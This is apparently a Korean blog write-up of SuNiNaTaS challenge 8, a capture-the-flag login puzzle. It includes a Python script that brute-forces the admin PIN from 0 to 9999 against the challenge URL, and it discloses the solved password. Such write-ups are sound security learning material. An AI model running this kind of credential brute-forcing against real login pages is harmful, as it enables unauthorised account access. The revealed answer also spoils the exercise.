SuNiNaTaS - 8번

평범한 로그인 페이지가 보인다.

admin 계정으로 로그인을 시도해보고,

SQL 쿼리도 날려봤지만 별다른 반응이 없었다.

소스코드를 확인해보니,

비밀번호는 4자리로 제한돼 있었고,

힌트를 보면

계정은 admin

비밀번호는 0~9999 중 하나라고 돼 있다.

import requests

url = 'http://suninatas.com/challenge/web08/web08.asp'
password = 0

for i in range(0, 9999):
    account = {'id':'admin', 'pw': i}
    response = requests.post(url, data=account)
    
    if("Authkey" in response.text):
        password = i
        break
    print(i)
    
print('password : ', password)

Burp Suite 의 intruder 기능을 사용해도 좋지만

필자는 무료 버전이라 속도가 느려서

파이썬 코드를 작성했다.

해당 코드는 문제 페이지에 admin 이란 계정의 로그인 시도를

비밀번호 0 에서 부터 9999 까지 Brute Force 하는 코드이다.

코드를 실행해보니,

admin의 비밀번호는 7707 라는 것을 알 수 있다.

ID : admin
PW : 7707

얻은 비밀번호로 로그인을 시도해보니,

AuthKey를 얻을 수 있었다.